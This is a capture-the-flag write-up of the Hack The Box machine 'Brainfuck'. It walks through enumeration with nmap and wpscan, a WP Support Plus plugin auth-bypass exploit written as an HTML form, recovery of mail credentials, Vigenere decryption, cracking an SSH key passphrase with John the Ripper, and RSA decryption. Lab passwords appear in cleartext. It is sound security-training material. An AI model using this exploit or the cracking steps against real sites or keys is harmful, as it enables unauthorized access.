Reconnaissance

nmap -sC -sV -O -vv 10.10.10.17 -oA brainfuck

PORT    STATE SERVICE  REASON         VERSION
22/tcp  open  ssh      syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 94:d0:b3:34:e9:a5:37:c5:ac:b9:80:df:2a:54:a5:f0 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDUvFkWE1DxJj4OsU4DiVLjkxYV2a9pSlMS/78hpx0IejJaFilgNb+RFCyfyhIw5NvsZB6hZiNL0vPDh+MscPd75heIIgx9mczfamsrA2KODdkdgUJPCBWUnF9/VhYQhJpGvo4f6lAwLz7wnmcjhiXencMNkZcweADi5aK0Xp6iFxYcwx6+qy0891gQ5TnVVazkDJNA+QMUamxJRm1tQN5dp/+TeBecWJH2AxQFXsM4wPkIFaE0GsKvYDmGyfy1YL/Gn5IxEqVrhIEYkDH4BQsbvORNueOtJKHoys7EhPF+STpx6ZAXS6AXhS/nJMz6EvubzeGqfBOaDIZN9u5JuCdf
|   256 6b:d5:dc:15:3a:66:7a:f4:19:91:5d:73:85:b2:4c:b2 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCJcOJZuuBlw9xDXy+VPpezMomPfySGOjABaxw02cmRifvzWE57mh1hlQD6z44IF1lsuW9E2NNH4xB4d8U0O5b0=
|   256 23:f5:a3:33:33:9d:76:d5:f2:ea:69:71:e3:4e:8e:02 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOokdEAUqLEqEuY1CHNJ2xaDU+L+/0qb3XZO8UIZfrju
25/tcp  open  smtp     syn-ack ttl 63 Postfix smtpd
|_smtp-commands: brainfuck, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
110/tcp open  pop3     syn-ack ttl 63 Dovecot pop3d
|_pop3-capabilities: TOP USER SASL(PLAIN) AUTH-RESP-CODE CAPA RESP-CODES PIPELINING UIDL
143/tcp open  imap     syn-ack ttl 63 Dovecot imapd
|_imap-capabilities: OK post-login Pre-login AUTH=PLAINA0001 more ENABLE capabilities IMAP4rev1 have LITERAL+ listed SASL-IR ID LOGIN-REFERRALS IDLE
443/tcp open  ssl/http syn-ack ttl 63 nginx 1.10.0 (Ubuntu)
|_http-title: Welcome to nginx!
| http-methods:
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.10.0 (Ubuntu)
| tls-alpn:
|_  http/1.1
| tls-nextprotoneg:
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=brainfuck.htb/organizationName=Brainfuck Ltd./stateOrProvinceName=Attica/countryName=GR/emailAddress=orestis@brainfuck.htb/localityName=Athens/organizationalUnitName=IT
| Subject Alternative Name: DNS:www.brainfuck.htb, DNS:sup3rs3cr3t.brainfuck.htb
| Issuer: commonName=brainfuck.htb/organizationName=Brainfuck Ltd./stateOrProvinceName=Attica/countryName=GR/emailAddress=orestis@brainfuck.htb/localityName=Athens/organizationalUnitName=IT
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2017-04-13T11:19:29
| Not valid after:  2027-04-11T11:19:29
| MD5:   cbf1 6899 96aa f7a0 0565 0fc0 9491 7f20
| SHA-1: f448 e798 a817 5580 879c 8fb8 ef0e 2d3d c656 cb66
| -----BEGIN CERTIFICATE-----
| MIIFQzCCA6ugAwIBAgIJAI24F5h8eY+HMA0GCSqGSIb3DQEBCwUAMIGTMQswCQYD
| VQQGEwJHUjEPMA0GA1UECAwGQXR0aWNhMQ8wDQYDVQQHDAZBdGhlbnMxFzAVBgNV
| BAoMDkJyYWluZnVjayBMdGQuMQswCQYDVQQLDAJJVDEWMBQGA1UEAwwNYnJhaW5m
| dWNrLmh0YjEkMCIGCSqGSIb3DQEJARYVb3Jlc3Rpc0BicmFpbmZ1Y2suaHRiMB4X
| DTE3MDQxMzExMTkyOVoXDTI3MDQxMTExMTkyOVowgZMxCzAJBgNVBAYTAkdSMQ8w
| DQYDVQQIDAZBdHRpY2ExDzANBgNVBAcMBkF0aGVuczEXMBUGA1UECgwOQnJhaW5m
| dWNrIEx0ZC4xCzAJBgNVBAsMAklUMRYwFAYDVQQDDA1icmFpbmZ1Y2suaHRiMSQw
| IgYJKoZIhvcNAQkBFhVvcmVzdGlzQGJyYWluZnVjay5odGIwggGiMA0GCSqGSIb3
| DQEBAQUAA4IBjwAwggGKAoIBgQCjBI0m6FWgcLYONyxVeMgc+PuTFJMnMUjMb8BF
| t0PIDSCt10grCCfzBNDIqfU9byiokyYVvvD+sRoWJQfMjd3I3NXMxHwpcLM6X9oR
| Twt1iBBJRQkTnHOs1hyCmkiM+kn2W1xdL+mwBylAUlvUReLIDdS5anE7u95ApWsD
| TTUt/mMUl1DwnCqrNkt3czQzCNfCIwIhbaLjsoXsiVo1fFEr6UpsyiaXad9eTTsl
| EF9k3rByXrmP1WrkaFLqGhqS4v+rYtsyKGPngjAB664aAvB2sSI0/EuOTa7WOPcV
| NP3Tga+zx55qXPeo6nqCttOlAKKwiZqba5AgDAjSFdB6Q60dghWSuRYU999Ku6zA
| DdwP0BoT5+kcZJENY7wx1uzysSMrtCoi8E6bfx42UwNQe/UCDDXErXat90hTB+vV
| h2vaSdyR0tz3w1iIHBZH5/3rY3f+LyfE9fSg2TbGFgZNDq6O/iykVWb9SG+tl1fA
| RB208Y1/mOw0+84G9RIjLVMLb0kCAwEAAaOBlzCBlDAdBgNVHQ4EFgQUj12KscJg
| /6gSHzm+kzSN/psvik8wHwYDVR0jBBgwFoAUj12KscJg/6gSHzm+kzSN/psvik8w
| DAYDVR0TBAUwAwEB/zALBgNVHQ8EBAMCBeAwNwYDVR0RBDAwLoIRd3d3LmJyYWlu
| ZnVjay5odGKCGXN1cDNyczNjcjN0LmJyYWluZnVjay5odGIwDQYJKoZIhvcNAQEL
| BQADggGBAJ11TuRhhSQfq5NHXU5fV5VkCOPUx3yKsWjt93Qm8WDD2rJcZAq8jW59
| NHDWhzDlKZMyNYv8gKJ8k6HuG3f20yeifKZulGw/YsY6dDtTzO+tooBqzjWb9irh
| bpMIVXv1xBSuz+f5YGdzpvlMK/Ltt1nEQNjKXaTnjy7OGfp4isMZCzBZeKAKnjdn
| +s6TgFrFA94B56naXNaNLHvv9WcFKviwDTP2PtDz0fc9hbnZz8oxE5Q6/l50NGUK
| 6bGCVIjDJfM/SsWPLHb4J6chkJxlZZLmpid+s5PsKSdY0ZZ1Oxb20O2mla77hDSJ
| d43t/sZRBwWPEWxAHUR8Dj5pcrbCFyi57Qu4ENc5w7H0RhRyd0/OWs6ahn2ef4Qy
| DSWfdpd5CVBGdSLVlVSjzLcBDmWuyy8q5CTgJ3VzIzOreg93F2mVAF+tlNZRX9rc
| dFjsS0lwXWRZqd6642VuAtf4HoAFBh9PfBtUx+t1DxCXyY7OTwnvMsnNFg9fw11v
| krhc81zFeg==
|_-----END CERTIFICATE-----

Exploitation

Going to → https://10.10.10.17/ and viewing the certificate information

# Adding those dns names into /etc/hosts
nano /etc/hosts
 
10.10.10.17     brainfuck.htb   www.brainfuck.htb       sup3rs3cr3t.brainfuck.htb

Accessing both → https://brainfuck.htb/ and https://sup3rs3cr3t.brainfuck.htb/

Wordpress scan

wpscan --url https://brainfuck.htb -e u,ap --disable-tls-checks

__          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|
 
         WordPress Security Scanner by the WPScan Team
                         Version 3.8.20
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
 
[+] URL: https://brainfuck.htb/ [10.10.10.17]
[+] Started: Sun Feb  6 17:40:35 2022
 
Interesting Finding(s):
 
[+] Headers
 | Interesting Entry: Server: nginx/1.10.0 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%
 
[+] XML-RPC seems to be enabled: https://brainfuck.htb/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
 
[+] WordPress readme found: https://brainfuck.htb/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 
[+] The external WP-Cron seems to be enabled: https://brainfuck.htb/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299
 
[+] WordPress version 4.7.3 identified (Insecure, released on 2017-03-06).
 | Found By: Rss Generator (Passive Detection)
 |  - https://brainfuck.htb/?feed=rss2, <generator>https://wordpress.org/?v=4.7.3</generator>
 |  - https://brainfuck.htb/?feed=comments-rss2, <generator>https://wordpress.org/?v=4.7.3</generator>
 
[+] WordPress theme in use: proficient
 | Location: https://brainfuck.htb/wp-content/themes/proficient/
 | Last Updated: 2022-02-01T00:00:00.000Z
 | Readme: https://brainfuck.htb/wp-content/themes/proficient/readme.txt
 | [!] The version is out of date, the latest version is 3.0.74
 | Style URL: https://brainfuck.htb/wp-content/themes/proficient/style.css?ver=4.7.3
 | Style Name: Proficient
 | Description: Proficient is a Multipurpose WordPress theme with lots of powerful features, instantly giving a prof...
 | Author: Specia
 | Author URI: https://speciatheme.com/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.0.6 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - https://brainfuck.htb/wp-content/themes/proficient/style.css?ver=4.7.3, Match: 'Version: 1.0.6'
 
[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
 
[i] Plugin(s) Identified:
 
[+] wp-support-plus-responsive-ticket-system
 | Location: https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/
 | Last Updated: 2019-09-03T07:57:00.000Z
 | [!] The version is out of date, the latest version is 9.1.2
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 7.1.3 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt
 
[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <===============================================================================> (10 / 10) 100.00% Time: 00:00:00
 
[i] User(s) Identified:
 
[+] admin
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)
 
[+] administrator
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
 
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
 
[+] Finished: Sun Feb  6 17:40:59 2022
[+] Requests Done: 25
[+] Cached Requests: 39
[+] Data Sent: 6.472 KB
[+] Data Received: 60.767 KB
[+] Memory used: 229.125 MB
[+] Elapsed time: 00:00:24

Found 2 users admin and administrator
Plugin vulnerable → [+] wp-support-plus-responsive-ticket-system (Version: 7.1.3 (100% confidence))

searchsploit wp support
 
	-> WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - Privilege Escalation                                     | php/webapps/41006.txt
	-> WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - SQL Injection                                            | php/webapps/40939.txt

searchsploit -x 41006.txt
 
 
------------------------------------------------------------
# Exploit Title: WP Support Plus Responsive Ticket System 7.1.3 Privilege Escalation
# Date: 10-01-2017
# Software Link: https://wordpress.org/plugins/wp-support-plus-responsive-ticket-system/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: web
 
1. Description
 
You can login as anyone without knowing password because of incorrect usage of wp_set_auth_cookie().
 
http://security.szurek.pl/wp-support-plus-responsive-ticket-system-713-privilege-escalation.html
 
2. Proof of Concept
 
<form method="post" action="http://wp/wp-admin/admin-ajax.php">
        Username: <input type="text" name="username" value="administrator">
        <input type="hidden" name="email" value="sth">
        <input type="hidden" name="action" value="loginGuestFacebook">
        <input type="submit" value="Login">
</form>
 
Then you can go to admin panel.
------------------------------------------------------------

# Create a file called exploit.html
# action="https://brainfuck.htb/admin-ajax.php"
# input type="text" name="username" value="admin"
# name="email" value="orestis@brainfuck.htb"
 
----------------------------------------------------------------
<form method="post" action="https://brainfuck.htb/wp-admin/admin-ajax.php">
        Username: <input type="text" name="username" value="admin">
        <input type="hidden" name="email" value="orestis@brainfuck.htb">
        <input type="hidden" name="action" value="loginGuestFacebook">
        <input type="submit" value="Login">
</form>
----------------------------------------------------------------

After creating the payload we can host the form using python

code

python -m SimpleHTTPServer # within the file that contains the html form

go to -> localhost.com:8000 and click login

go back to the website -> https://brainfuck.htb/ # We are logged-in

SMTP

Going to Dashboard → Appearance → Editor
The files are not writable to get a shell
Going to Settings → Easy WP SMTP
- Found:
  - SMTP username : orestis
  - SMTP Password: kHGuERB29DNiNE ,inspect element on the password field to get the password

sudo apt-get install evolution # Download evolution mail client

Open the evolution program → next → next

Full Name: Orestis Email Address: orestis@brainfuck.htb

Server: brainfuck.htb
Username: orestis
Port: 143
No encryption
Skip Options

Server: brainfuck.htb
Port: 25
Encryption method: No encryption

Enter the password in the mail application: kHGuERB29DNiNE

Hi there, your credentials for our "secret" forum are below :)
 
username:   **admin** and **orestis**
password: **admin** and **kIEnnfEKJ#9UmdO**
 
Regards

Creds -> username: orestis | password: kIEnnfEKJ#9UmdO

Your new WordPress site has been successfully set up at:
 
https://brainfuck.htb
 
You can log in to the administrator account with the following information:
 
Username: admin
Password: The password you chose during the install.
Log in here: https://brainfuck.htb/wp-login.php
 
We hope you enjoy your new site. Thanks!

Login with the creds found in the Super Secret Forum
orestis | kIEnnfEKJ#9UmdO
Identified that is Vigenere cipher
- https://www.dcode.fr/vigenere-cipher
  - Vigenere Ciphertext → Pieagnm - Jkoijeg nbw zwx mle grwsnn
  - Keypassword → Orestis - Hacking for fun and profit → Brainfu - Ckmybra inf uck myb rainfu → brainfuck
Decipher the rest of the message

Cipher: Vigenere | key: fuckmybrain
----------------------------------------
orestis
Mya qutf de buj otv rms dy srd vkdof
Pieagnm - Jkoijeg nbw zwx mle grwsnn
 
admin
Xua zxcbje iai c leer nzgpg ii uy...
 
orestis
Ufgoqcbje....
Wejmvse - Fbtkqal zqb rso rnl cwihsf
 
admin
Ybgbq wpl gw lto udgnju fcpp, C jybc zfu zrryolqp zfuz xjs rkeqxfrl ojwceec J uovg
mnvze://10.10.10.17/8zb5ra10m915218697q1h658wfoq0zc8/frmfycu/sp_ptr
 
orestis
Si rbazmvm, Q'yq vtefc gfrkr nn
Qbqquzs - Pnhekxs dpi fca fhf zdmgzt
 
----------------------------------------
 
orestis
Hey give me the url for my key bitch
Orestis - Hacking for fun and profit
 
admin
Say please and i just might do so...
 
orestis
Pleeeease....
Orestis - Hacking for fun and profit
 
admin
There you go you stupid fuck, I hope you remember your key password because I dont
https://10.10.10.17/8ba5aa10.../orestis/id_rsa
 
No problem, I'll brute force it
Orestis - Hacking for fun and profit

Interesting → There you go you stupid fuck, I hope you remember your key password because I dont https://10.10.10.17/8ba5aa10.../orestis/id_rsa No problem, I'll brute force it Orestis - Hacking for fun and profit

We have encrypted id_rsa we need to use JohnTheRipper. We will be using ssh2john.py

locate ssh2john
 
/usr/share/john/ssh2john.py id_rsa > forjohn.txt
 
john --wordlist=/usr/share/wordlists/rockyou.txt forjohn.txt
	-> Using default input encoding: UTF-8
		Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
		Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
		Cost 2 (iteration count) is 1 for all loaded hashes
		Press 'q' or Ctrl-C to abort, almost any other key for status
		3poulakia!       (id_rsa)
		1g 0:00:00:06 DONE (2022-02-06 21:12) 0.1579g/s 1968Kp/s 1968Kc/s 1968KC/s 3poulakia!
		Use the "--show" option to display all of the cracked passwords reliably
		Session completed.

Found ssh password 3poulakia!

ssh -i id_rsa orestis@10.10.10.17
	-> password for id_rsa -> 3poulakia!
 
cat user.txt
	-> ********************************

Privilege Escalation

orestis@brainfuck:~$ ls
	-> debug.txt  encrypt.sage  mail  output.txt  user.txt
 
orestis@brainfuck:~$ cat encrypt.sage
nbits = 1024
 
password = open("/root/root.txt").read().strip()
enc_pass = open("output.txt","w")
debug = open("debug.txt","w")
m = Integer(int(password.encode('hex'),16))
 
p = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)
q = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)
n = p*q
phi = (p-1)*(q-1)
e = ZZ.random_element(phi)
while gcd(e, phi) != 1:
    e = ZZ.random_element(phi)
 
 
 
c = pow(m, e, n)
enc_pass.write('Encrypted Password: '+str(c)+'\n')
debug.write(str(p)+'\n')
debug.write(str(q)+'\n')
debug.write(str(e)+'\n')

Google and paste p = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)
→https://ctftime.org/writeup/6434. It is RSA
Google how to decrypt RSA p q e

# Source: -> https://crypto.stackexchange.com/questions/19444/rsa-given-q-p-and-e
 
nano decypher.txt
---------------
def egcd(a, b):
    x,y, u,v = 0,1, 1,0
    while a != 0:
        q, r = b//a, b%a
        m, n = x-u*q, y-v*q
        b,a, x,y, u,v = a,r, u,v, m,n
        gcd = b
    return gcd, x, y
 
def main():
 
    p = 1090660992520643446103273789680343
    q = 1162435056374824133712043309728653
    e = 65537
    ct = 299604539773691895576847697095098784338054746292313044353582078965
 
    # compute n
    n = p * q
 
    # Compute phi(n)
    phi = (p - 1) * (q - 1)
 
    # Compute modular inverse of e
    gcd, a, b = egcd(e, phi)
    d = a
 
    print( "n:  " + str(d) );
 
    # Decrypt ciphertext
    pt = pow(ct, d, n)
    print( "pt: " + str(pt) )
 
if __name__ == "__main__":
    main()

restis@brainfuck:~$ cat debug.txt
7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307 # p value
7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079 # q value
30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997 # e value

orestis@brainfuck:~$ cat output.txt
Encrypted Password: 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182 # replace this value in ct

python decrypt.py
	n:  8730619434505424202695243393110875299824837916005183495711605871599704226978295096241357277709197601637267370957300267235576794588910779384003565449171336685547398771618018696647404657266705536859125227436228202269747809884438885837599321762997276849457397006548009824608365446626232570922018165610149151977
	pt: 24604052029401386049980296953784287079059245867880966944246662849341507003750

Convert decimal to Hex →https://www.rapidtables.com/convert/number/decimal-to-hex.html
Convert Hex to String →https://string-functions.com/hex-string.aspx

Decimal: 24604052029401386049980296953784287079059245867880966944246662849341507003750
to
Hex: 3665666331613564626238393034373531636536353636613330356262386566
to
string: 6efc1a5d...
	root flag -> ********************************

Skills Learned

Enumerating SSL certificates
Exploiting Wordpress
Exploit modification
Enumerating mail servers
Decoding Vigenere ciphers
SSH key brute forcing
RSA decryption techniques